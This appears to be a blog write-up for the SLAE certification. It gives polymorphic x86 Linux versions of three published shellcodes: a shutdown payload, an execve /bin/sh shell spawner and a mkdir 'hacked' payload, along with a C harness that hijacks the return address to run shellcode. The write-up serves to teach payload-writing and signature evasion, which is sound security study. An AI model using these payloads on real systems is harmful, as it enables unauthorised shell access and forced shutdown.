; http://shell-storm.org/shellcode/files/shellcode-876.php;Polymorphic version modified by @davidlebr1 forSLAE certification -69 bytesglobal _start_start: cdq mul edx push word 0x682d mov edi, esp push eax push 0x6e mov WORD [esp+0x1],0x776f mov edi, esp push eax mov dword [esp-4],0x6e776f64 mov dword [esp-8],0x74756873 mov dword [esp-12],0x2f2f2f6e mov dword [esp-16],0x6962732fsub esp,16 mov ebx, esp push edx push esi push edi push ebx mov ecx, esp mov al,0xb int 0x80
Has we can see on the following block of code below, there is some modification of the assembly which give a different shellcode but give the same result. The modified versions have 69 bytes. So, this is less than the 150% of the original shellcode. The maximum allowed for the assignment of this sample is 84 bytes.
; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes
global _start
_start:
xor eax, eax
xor ecx, ecx
push eax
mov dword [esp-4], 0x68732f2f
mov dword [esp-8], 0x6e69622f
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
The polymorphic version have 30 bytes which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there is less possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.
/* * This shellcode will do a mkdir() of 'hacked' and then an exit() * Written by zillion@safemode.org * */char shellcode[]="\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed""\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68""\x61\x63\x6b\x65\x64\x23";voidmain(){int*ret; ret = (int*)&ret +2; (*ret) = (int)shellcode;}
The author only gave the shellcode. So, for the purpose of the SLAE, we will get the assembly of that shellcode for better understanding and be able to create a polymorphic version of it.
The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.
Polymorphic shellcode version
I realized that a lot of the assembly in the original one can be modified to do a different version of it. Let's keep it simple. Basically, the shellcode will create a mkdir folder with the name "hacked" with the right 775.
My final assembly polymorphic shellcode is pretty different but does the same thing.
; http://shell-storm.org/shellcode/files/shellcode-542.php; Polymorphic version modified by @davidlebr1 for SLAE certification -28 bytesglobal _start_start: xor eax,eax push eax ;sys mkdir mov al,0x27 ; push ./hacked push 0x64656b63 push 0x61682f2e mov ebx,esp ; push 777 which equal to 0x1ff in octal mov cx,0x1ffint0x80 ;sys exit push 0x1 pop eaxint0x80